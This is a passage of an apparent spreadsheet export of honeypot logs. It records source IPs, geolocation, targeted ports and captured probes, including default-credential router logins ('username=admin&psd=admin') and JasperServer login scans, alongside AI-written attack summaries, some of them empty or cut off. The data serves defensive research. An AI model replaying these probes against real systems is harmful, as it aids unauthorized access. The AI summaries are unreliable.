NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}</t>
  </si>
  <si>
    <t>::ffff:b9b4:8c6a</t>
  </si>
  <si>
    <t>The attacker is scanning and attempting to exploit various services on the targeted network, likely as part of a reconnaissance or enumeration phase to identify potential entry points.</t>
  </si>
  <si>
    <t xml:space="preserve"> Credential stuffing, brute force attacks, SQL injection</t>
  </si>
  <si>
    <t>9d0dc68b41692bcf59d144046fa56a07</t>
  </si>
  <si>
    <t>216.9.227.245</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;47768&amp;&amp;58544</t>
  </si>
  <si>
    <t>{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam']}</t>
  </si>
  <si>
    <t>745044</t>
  </si>
  <si>
    <t>34122</t>
  </si>
  <si>
    <t>41.0082</t>
  </si>
  <si>
    <t>28.9784</t>
  </si>
  <si>
    <t>208287</t>
  </si>
  <si>
    <t>DC Host INC</t>
  </si>
  <si>
    <t>DC HOST Inc</t>
  </si>
  <si>
    <t>::ffff:d809:e3f5</t>
  </si>
  <si>
    <t>The log data suggests a lack of activity from malicious actors, as there is no recorded information to indicate any suspicious behavior or attempts to exploit services. This implies that no malicious activities have been detected so far. The absence of such records is normal for an active monitoring system with no reported incidents.</t>
  </si>
  <si>
    <t>I'm ready when you are! However, it seems like there's no log data provided. If you could provide the actual log data, I'd be happy to analyze and identify the types of attacks for you.</t>
  </si>
  <si>
    <t>c3b4a0689b39c8541c346e0a77431d4c</t>
  </si>
  <si>
    <t>102.212.41.55</t>
  </si>
  <si>
    <t>AK</t>
  </si>
  <si>
    <t>Akwa Ibom State</t>
  </si>
  <si>
    <t>Uyo</t>
  </si>
  <si>
    <t>2319480</t>
  </si>
  <si>
    <t>5.05127</t>
  </si>
  <si>
    <t>7.9335</t>
  </si>
  <si>
    <t>329244</t>
  </si>
  <si>
    <t>Connect, Surf and Smile Limited</t>
  </si>
  <si>
    <t>::ffff:66d4:2937</t>
  </si>
  <si>
    <t>97c0f25bae00291fe166900fc5c579b8</t>
  </si>
  <si>
    <t>125.227.109.170</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-227-109-170.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:7de3:6daa</t>
  </si>
  <si>
    <t>0ea9e38d6c444ab68f0a3e96d880515e</t>
  </si>
  <si>
    <t>169.255.26.53</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H30</t>
  </si>
  <si>
    <t>SS</t>
  </si>
  <si>
    <t>South Sudan</t>
  </si>
  <si>
    <t>EC</t>
  </si>
  <si>
    <t>Central Equatoria</t>
  </si>
  <si>
    <t>Juba</t>
  </si>
  <si>
    <t>373303</t>
  </si>
  <si>
    <t>4.85165</t>
  </si>
  <si>
    <t>31.5825</t>
  </si>
  <si>
    <t>327786</t>
  </si>
  <si>
    <t>4G Telecom</t>
  </si>
  <si>
    <t>4GTelecomS3</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,49736)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,49921)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,54049)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,54112)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,54176)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,54213)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,53651)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,53693)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,53515)}</t>
  </si>
  <si>
    <t>::ffff:a9ff:1a35</t>
  </si>
  <si>
    <t>Potential malicious activity is a remote system attempting to connect to a vulnerable SMB service from an unusual IP address. This could be a sign of exploitation or unauthorized access attempt. The unusual port number and IP address add to the suspicious nature of this event. &amp;&amp; Unsolicited incoming SMB connection from an unknown IP address suggests potential malware scanning or exploitation attempt of the system's shared resources. 
The attacker may be probing for vulnerable services or attempting to establish a backdoor connection. This activity could also indicate a brute-force attack on account credentials.</t>
  </si>
  <si>
    <t>SMB Attack &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>fdf7fe713f7cecdc356e543267eda98e</t>
  </si>
  <si>
    <t>47.247.212.114</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1433&amp;&amp;58726&amp;&amp;58752</t>
  </si>
  <si>
    <t>Jabalpur</t>
  </si>
  <si>
    <t>1269633</t>
  </si>
  <si>
    <t>482011</t>
  </si>
  <si>
    <t>23.1686</t>
  </si>
  <si>
    <t>79.9339</t>
  </si>
  <si>
    <t>::ffff:2ff7:d472</t>
  </si>
  <si>
    <t>The attacker is attempting to gather information about the network and its services, possibly as a reconnaissance step before launching a more targeted attack. They are scanning for open ports and trying various protocols and credentials to see what they can access.</t>
  </si>
  <si>
    <t xml:space="preserve"> Port scanning and Reconnaissance</t>
  </si>
  <si>
    <t>cfd0f5eee09fe6012c2a734449e1438c</t>
  </si>
  <si>
    <t>160.178.100.78</t>
  </si>
  <si>
    <t>09</t>
  </si>
  <si>
    <t>Souss-Massa</t>
  </si>
  <si>
    <t>Tiznit Province</t>
  </si>
  <si>
    <t>Sidi Ifni</t>
  </si>
  <si>
    <t>2534515</t>
  </si>
  <si>
    <t>29.3797</t>
  </si>
  <si>
    <t>-10.173</t>
  </si>
  <si>
    <t>2014-11-10</t>
  </si>
  <si>
    <t>::ffff:a0b2:644e</t>
  </si>
  <si>
    <t>f7ffd5b7e389cfae577c6910971c2cb7</t>
  </si>
  <si>
    <t>200.73.2.42</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;53&amp;&amp;21536&amp;&amp;NA</t>
  </si>
  <si>
    <t>Chile</t>
  </si>
  <si>
    <t>RM</t>
  </si>
  <si>
    <t>Santiago Metropolitan</t>
  </si>
  <si>
    <t>Provincia de Santiago</t>
  </si>
  <si>
    <t>Providencia</t>
  </si>
  <si>
    <t>3875139</t>
  </si>
  <si>
    <t>-33.4311</t>
  </si>
  <si>
    <t>-70.6045</t>
  </si>
  <si>
    <t>18747</t>
  </si>
  <si>
    <t>IFX Corporation</t>
  </si>
  <si>
    <t>IFX Networks Chile S.A</t>
  </si>
  <si>
    <t>::ffff:c849:22a</t>
  </si>
  <si>
    <t>7998e98d812530cdd1d606114567ed92</t>
  </si>
  <si>
    <t>59.184.75.117</t>
  </si>
  <si>
    <t>::ffff:3bb8:4b75</t>
  </si>
  <si>
    <t>2e0cfe222614649ee0b3855c362e8c90</t>
  </si>
  <si>
    <t>115.187.49.145</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>North 24 Parganas</t>
  </si>
  <si>
    <t>Ula</t>
  </si>
  <si>
    <t>1349247</t>
  </si>
  <si>
    <t>22.7225</t>
  </si>
  <si>
    <t>88.5556</t>
  </si>
  <si>
    <t>2008-09-11</t>
  </si>
  <si>
    <t>::ffff:73bb:3191</t>
  </si>
  <si>
    <t>f22baab596360d71990c1a59d0420191</t>
  </si>
  <si>
    <t>43.242.117.89</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;54705&amp;&amp;54738</t>
  </si>
  <si>
    <t>Surendranagar</t>
  </si>
  <si>
    <t>Limbdi</t>
  </si>
  <si>
    <t>1264912</t>
  </si>
  <si>
    <t>22.5651</t>
  </si>
  <si>
    <t>71.8108</t>
  </si>
  <si>
    <t>45916</t>
  </si>
  <si>
    <t>Gujarat Telelink Pvt Ltd</t>
  </si>
  <si>
    <t>GTPL Kuttch N/W Pvt. Ltd</t>
  </si>
  <si>
    <t>Gtpl Broadband Pvt. Ltd.</t>
  </si>
  <si>
    <t>2014-09-01</t>
  </si>
  <si>
    <t>GUJARATKUTCHNETWORK</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (43.242.117.89,55867)}&amp;&amp;{Data_SMB:Incoming connection (43.242.117.89,56588)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:2bf2:7559</t>
  </si>
  <si>
    <t>32dc3b6669d661ca51f2dce1f41d4fb5</t>
  </si>
  <si>
    <t>136.232.237.138</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H43</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;5900&amp;&amp;55877&amp;&amp;1433&amp;&amp;3306&amp;&amp;445&amp;&amp;5900&amp;&amp;37168&amp;&amp;51457&amp;&amp;51470</t>
  </si>
  <si>
    <t>1989-10-03</t>
  </si>
  <si>
    <t>::ffff:88e8:ed8a</t>
  </si>
  <si>
    <t>5eff6bdbbc34319939af05355d51b2fd</t>
  </si>
  <si>
    <t>183.82.0.177</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>65105&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>12.9838</t>
  </si>
  <si>
    <t>77.5969</t>
  </si>
  <si>
    <t>::ffff:b752:b1</t>
  </si>
  <si>
    <t>f14c26a19db73618f76f3f52635f7f1f</t>
  </si>
  <si>
    <t>103.72.73.30</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H32</t>
  </si>
  <si>
    <t>132296</t>
  </si>
  <si>
    <t>Seven Star Digital Network Private Limited</t>
  </si>
  <si>
    <t>::ffff:6748:491e</t>
  </si>
  <si>
    <t>506ddfea60885435152f764905f567a6</t>
  </si>
  <si>
    <t>141.98.11.98</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_MSSQL_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5659</t>
  </si>
  <si>
    <t>::ffff:8d62:b62</t>
  </si>
  <si>
    <t>e929acc8ab870d5065d7f72d73cc00b9</t>
  </si>
  <si>
    <t>147.185.133.56</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_SOCKS5_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;36231&amp;&amp;39103&amp;&amp;53855&amp;&amp;1080&amp;&amp;6667&amp;&amp;56307&amp;&amp;52008&amp;&amp;54108&amp;&amp;443&amp;&amp;49386&amp;&amp;52657&amp;&amp;56087&amp;&amp;55176&amp;&amp;50975</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTPS:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:8538</t>
  </si>
  <si>
    <t>8b059950c0a47fa1e1123312f828ca93</t>
  </si>
  <si>
    <t>49.37.159.35</t>
  </si>
  <si>
    <t>1433&amp;&amp;3306&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3125:9f23</t>
  </si>
  <si>
    <t>e989ab56c8db54b604709889f5058c1f</t>
  </si>
  <si>
    <t>189.70.170.131</t>
  </si>
  <si>
    <t>NA&amp;&amp;189-70-170-131.user3p.veloxzone.com.br</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;25178&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>Santa Inês</t>
  </si>
  <si>
    <t>3389609</t>
  </si>
  <si>
    <t>-3.66667</t>
  </si>
  <si>
    <t>-45.38</t>
  </si>
  <si>
    <t>7738</t>
  </si>
  <si>
    <t>V tal</t>
  </si>
  <si>
    <t>Telemar Norte Leste S.A.</t>
  </si>
  <si>
    <t>::ffff:bd46:aa83</t>
  </si>
  <si>
    <t>4a96a6a22998a497a25844c31b51a2f1</t>
  </si>
  <si>
    <t>103.221.72.58</t>
  </si>
  <si>
    <t>1433&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>Aurangabad</t>
  </si>
  <si>
    <t>Aurangabad (Venkatesh Nagar)</t>
  </si>
  <si>
    <t>1278149</t>
  </si>
  <si>
    <t>431001</t>
  </si>
  <si>
    <t>19.8788</t>
  </si>
  <si>
    <t>75.3474</t>
  </si>
  <si>
    <t>SecureLayer7</t>
  </si>
  <si>
    <t>2016-05-31</t>
  </si>
  <si>
    <t>SECURE7</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,64230)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,64524)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,62208)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,62510)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,53851)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,53868)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,54329)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,57424)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,57442)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,57779)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,50388)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,50444)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,51740)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,50589)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,50930)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,53813)}&amp;&amp;{Data_SMB:Incoming connection (103.221.72.58,54212)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:67dd:483a</t>
  </si>
  <si>
    <t>e20175be5c64bcee5db9fd0fde8e42fc</t>
  </si>
  <si>
    <t>59.177.99.85</t>
  </si>
  <si>
    <t>::ffff:3bb1:6355</t>
  </si>
  <si>
    <t>1f73d3aef31751751ad47ee0787af416</t>
  </si>
  <si>
    <t>175.111.181.40</t>
  </si>
  <si>
    <t>New Delhi (Jagdamba Vihar)</t>
  </si>
  <si>
    <t>28.6012</t>
  </si>
  <si>
    <t>77.0951</t>
  </si>
  <si>
    <t>136637</t>
  </si>
  <si>
    <t>Cify IT Services Pvt Ltd</t>
  </si>
  <si>
    <t>Calcify It Services Pvt. Ltd</t>
  </si>
  <si>
    <t>::ffff:af6f:b528</t>
  </si>
  <si>
    <t>14646a73a6d62570d11930f226ba0152</t>
  </si>
  <si>
    <t>49.37.103.244</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>RJIL East FTTX PUBLIC</t>
  </si>
  <si>
    <t>::ffff:3125:67f4</t>
  </si>
  <si>
    <t>76cc3e33540825daac090612dbb96217</t>
  </si>
  <si>
    <t>117.192.32.68</t>
  </si>
  <si>
    <t>::ffff:75c0:2044</t>
  </si>
  <si>
    <t>bc870134c5c0263f37cd52e868b7e29d</t>
  </si>
  <si>
    <t>148.0.154.124</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H4</t>
  </si>
  <si>
    <t>Azua Province</t>
  </si>
  <si>
    <t>Padre Las Casas</t>
  </si>
  <si>
    <t>3495664</t>
  </si>
  <si>
    <t>18.7317</t>
  </si>
  <si>
    <t>-70.9392</t>
  </si>
  <si>
    <t>6400</t>
  </si>
  <si>
    <t>Compañía Dominicana de Teléfonos S. A.</t>
  </si>
  <si>
    <t>Compañía Dominicana de Teléfonos S. A</t>
  </si>
  <si>
    <t>::ffff:9400:9a7c</t>
  </si>
  <si>
    <t>0ff34a6c9d9af021b1802b7a58631409</t>
  </si>
  <si>
    <t>122.166.44.103</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>::ffff:7aa6:2c67</t>
  </si>
  <si>
    <t>9a1f10d2b7dc205439789b7c52e3d2f2</t>
  </si>
  <si>
    <t>123.25.11.41</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;3306&amp;&amp;14063&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (123.25.11.41,53066)}&amp;&amp;{Data_SMB:Incoming connection (123.25.11.41,54355)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:7b19:b29</t>
  </si>
  <si>
    <t>d3c009e2ec8abc01082d66461cab94bc</t>
  </si>
  <si>
    <t>103.43.18.59</t>
  </si>
  <si>
    <t>SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>143&amp;&amp;21&amp;&amp;8443&amp;&amp;23&amp;&amp;1080&amp;&amp;NA</t>
  </si>
  <si>
    <t>31.9828</t>
  </si>
  <si>
    <t>120.277</t>
  </si>
  <si>
    <t>{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:672b:123b</t>
  </si>
  <si>
    <t>The attacker is attempting to scan and connect to various services on the target system, likely trying to identify vulnerabilities or gain unauthorized access. The activities indicate a reconnaissance phase, where the attacker is gathering information about the system's configuration, services, and potential entry points. &amp;&amp; It appears that the attackers are scanning for open ports and attempting to gain access to various services, likely as part of a reconnaissance phase or pre-authentication attack. &amp;&amp; The attacker is attempting to scan and exploit various services on the targeted system, likely for potential vulnerabilities or unauthorized access. The attacker is using multiple protocols, such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and SOCKS5. &amp;&amp; Here are the possible malicious activities and their corresponding attack names:</t>
  </si>
  <si>
    <t xml:space="preserve">  &amp;&amp; Scan and Exploit Attack &amp;&amp; </t>
  </si>
  <si>
    <t>d6e63dac3f10b12116d67ceb71924a5a</t>
  </si>
  <si>
    <t>117.196.79.10</t>
  </si>
  <si>
    <t>::ffff:75c4:4f0a</t>
  </si>
  <si>
    <t>a854793daebfa8a28b9e2f0c6943d8fd</t>
  </si>
  <si>
    <t>71.247.210.94</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>20147</t>
  </si>
  <si>
    <t>39.011</t>
  </si>
  <si>
    <t>-77.4711</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;NA&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:47f7:d25e</t>
  </si>
  <si>
    <t>There is insufficient log data provided to analyze.</t>
  </si>
  <si>
    <t>There is no log data provided. Please provide the log data, and I'll be happy to help you analyze it.</t>
  </si>
  <si>
    <t>eed051bb6f2dfd01900176fafd51e00c</t>
  </si>
  <si>
    <t>102.212.40.117</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_LDAP_H1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;389&amp;&amp;NA&amp;&amp;57695&amp;&amp;57973&amp;&amp;36817&amp;&amp;36998&amp;&amp;80</t>
  </si>
  <si>
    <t>Ibesikpo Asutan</t>
  </si>
  <si>
    <t>Nung Udoe</t>
  </si>
  <si>
    <t>2328583</t>
  </si>
  <si>
    <t>4.91657</t>
  </si>
  <si>
    <t>7.96314</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/boaform/admin/formLogin?username=user&amp;psd=user'}}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/boaform/admin/formLogin?username=admin&amp;psd=admin'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:66d4:2875</t>
  </si>
  <si>
    <t>a7a59475be63436780a6f4571f2f0897</t>
  </si>
  <si>
    <t>45.79.134.22</t>
  </si>
  <si>
    <t>NA&amp;&amp;prod-barium-us-east-95.li.binaryedge.ninja</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_REDIS_H15</t>
  </si>
  <si>
    <t>1433&amp;&amp;6379&amp;&amp;3389&amp;&amp;NA</t>
  </si>
  <si>
    <t>NJ</t>
  </si>
  <si>
    <t>New Jersey</t>
  </si>
  <si>
    <t>Morris</t>
  </si>
